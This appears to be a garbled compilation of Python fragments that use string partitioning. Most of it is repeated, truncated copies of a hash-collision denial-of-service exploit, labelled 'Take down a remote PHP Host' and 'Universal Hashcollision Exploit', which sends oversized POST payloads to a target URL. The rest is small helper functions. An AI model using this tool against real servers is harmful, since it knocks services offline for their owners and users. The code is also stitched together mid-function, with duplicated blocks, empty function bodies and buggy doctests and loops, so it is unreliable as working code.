def split_pair(string, sep):
"""
>>> split_pair('2/4','/')
2,4
"""
pair = []
trio = list(string.partition(sep))
trio.remove(sep)
pair = tuple(trio)
return pair
def to_sec(string):
"""
>>> to_sec('1:0')
60
>>> to_int('10:13')
613
"""
time = string.partition(':')
sec = int(time[0]) * 60 + int(time[2])
return int(sec)
def split_pair(string,sep):
"""
>>> split_pair('2/4','/')
2,4
"""
pair = []
trio = list(string.partition(sep))
trio.remove(sep)
pair = tuple(trio)
return pair
def to_sec(string):
"""
>>> to_sec('1:0')
60
>>> to_int('10:13')
613
"""
time = string.partition(':')
sec = int(time[0])*60 + int(time[2])
return int(sec)
def parse_environment_variable_strings(
envvar_strings: Iterable[str]) -> Dict[str, str]:
"""
Parse a list of environment variable strings into a dict.
"""
environment_variables = {}
for string in envvar_strings:
key, _, value = string.partition('=')
key = key.strip()
if not key:
continue
environment_variables[key] = value.strip()
return environment_variables
def reParser(string):
'''
Parsea el string que recibe como parametro y genera una lista
con un operador y un argumento
'''
array = ['=']
operators = ['<', '>', '<>', '<=', '>=']
objects = re.findall(r"[><=]", string)
if (objects):
operator = ''.join(objects)
result = operator in operators
if result:
value = string.partition(operator)
string = value[2]
array[0] = operator
#Si el argumento no es un numero se le agregan comillas simples
if not string.replace('.', '', 1).isdigit():
string = "'" + string + "'"
array.append(string)
return array
def main():
parser = argparse.ArgumentParser(description="Take down a remote PHP Host", prog="PHP Hashtable Exploit")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-f", "--file", dest="file", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument('--version', action='version', version='%(prog)s 2.0')
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
print("Generating Payload...")
payload = generatePayload()
print("Payload generated")
if options.file:
f = open(options.file, 'w')
f.write(payload)
f.close()
print("Payload saved to %s" % options.file)
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = """POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)
Content-Length: %s
%s
""" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 300:
print(request[:300]+"....")
else:
print(request)
print
if options.wait or options.output:
start = time.clock()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.clock() - start)
print ("Request %s finished" % str(i+1))
print ("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print
print(header)
print
if options.output:
f = open(options.output+str(i)+".html", 'w')
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def substr_after(string, delim):
return string.partition(delim)[2]
print(request[:300]+"....")
else:
print(request)
print
if options.wait or options.output:
start = time.clock()
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.clock() - start)
print ("Request %s finished" % str(i+1))
print ("Request %s duration: %s" % (str(i+1), elapsed))
#only print http header
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
print
print(header)
print
if options.output:
f = open(options.output+str(i)+".html", 'w')
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
sock.close()
def generatePayload():
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
print(request[:300]+"....")
else:
print(request)
print
if options.wait or options.output:
start = time.clock()
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.clock() - start)
print ("Request %s finished" % str(i+1))
print ("Request %s duration: %s" % (str(i+1), elapsed))
#only print http header
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
print
print(header)
print
if options.output:
f = open(options.output+str(i)+".html", 'w')
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
sock.close()
def generatePayload():
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
def main():
parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
parser.add_argument("--version", action="version", version="%(prog)s 6.0")
options = parser.parse_args()
if options.target == "PHP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "ASP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "JAVA":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 2
else:
maxpayloadsize = options.maxpayloadsize
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
# Number of colliding chars to find
collisionchars = 5
# Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
collisioncharlength = 2
# Length of each parameter in the payload
payloadlength = 8
generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
if options.target == "PHP":
payload = generator.generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
payload = generator.generateJAVAPayload()
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = maxpayloadsize*1024*1024
payload = payload[:maxinmb]
# remove last invalid(cut off) parameter
position = payload.rfind("=&")
payload = payload[:position+1]
# Save payload
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
# User selected to only generate the payload
if options.generate:
return
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def getID(string):
"""Return the ID of a post."""
return string.partition('-')[0]
def main():
parser = argparse.ArgumentParser(description="Take down a remote PHP Host",
prog="PHP Hashtable Exploit")
parser.add_argument("-u",
"--url",
dest="url",
help="Url to attack",
required=True)
parser.add_argument("-w",
"--wait",
dest="wait",
action="store_true",
default=False,
help="wait for Response")
parser.add_argument("-c",
"--count",
dest="count",
type=int,
default=1,
help="How many requests")
parser.add_argument("-v",
"--verbose",
dest="verbose",
action="store_true",
default=False,
help="Verbose output")
parser.add_argument("-f",
"--file",
dest="file",
help="Save payload to file")
parser.add_argument(
"-o",
"--output",
dest="output",
help=
"Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w"
)
parser.add_argument('--version', action='version', version='%(prog)s 2.0')
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
print("Generating Payload...")
payload = generatePayload()
print("Payload generated")
if options.file:
f = open(options.file, 'w')
f.write(payload)
f.close()
print("Payload saved to %s" % options.file)
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i + 1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = """POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)
Content-Length: %s
%s
""" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 300:
print(request[:300] + "....")
else:
print(request)
print
if options.wait or options.output:
start = time.clock()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.clock() - start)
print("Request %s finished" % str(i + 1))
print("Request %s duration: %s" % (str(i + 1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print
print(header)
print
if options.output:
f = open(options.output + str(i) + ".html", 'w')
f.write("<!-- " + header + " -->\r\n" + content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
array_of_array.append(formated_data)
test_array_of_array = []
for test_line in test_dataset:
test_formated_data = line.split()
test_array_of_array.append(test_formated_data)
#Extracting the SMILES strings from excel dataset
formated_SMILE_array = []
c_reader = csv.reader(open('1K_unformated_unlabeled_SMILES_data.txt', 'r'),
delimiter=';')
col_2 = [x[0] for x in c_reader]
for string in col_2:
head, sep, tail = string.partition('\t')
SMILE = tail
formated_SMILE_array.append(SMILE)
test_formated_SMILE_array = []
test_c_reader = csv.reader(open('test_unformated_unlabeled_SMILES_data.txt',
'r'),
delimiter=';')
test_col_2 = [x[0] for x in test_c_reader]
for test_string in test_col_2:
head, sep, tail = test_string.partition('\t')
test_SMILE = tail
test_formated_SMILE_array.append(SMILE)
#Extracting the name of the Molecule
def getID(string):
"""Return the ID of a post."""
return string.partition('-')[0]
def highlight(string, hlsearch):
string = string.partition(hlsearch)
return string[0] + COLORS['red'] + string[1] + COLORS['stndrd'] + string[2]
def to_predicate(string, expected_result):
if not isinstance(expected_result, bool):
return string
if (partitioned := string.partition("-"))[2]:
return partitioned[2] + ("-p" if '-' in partitioned[2] else "p")
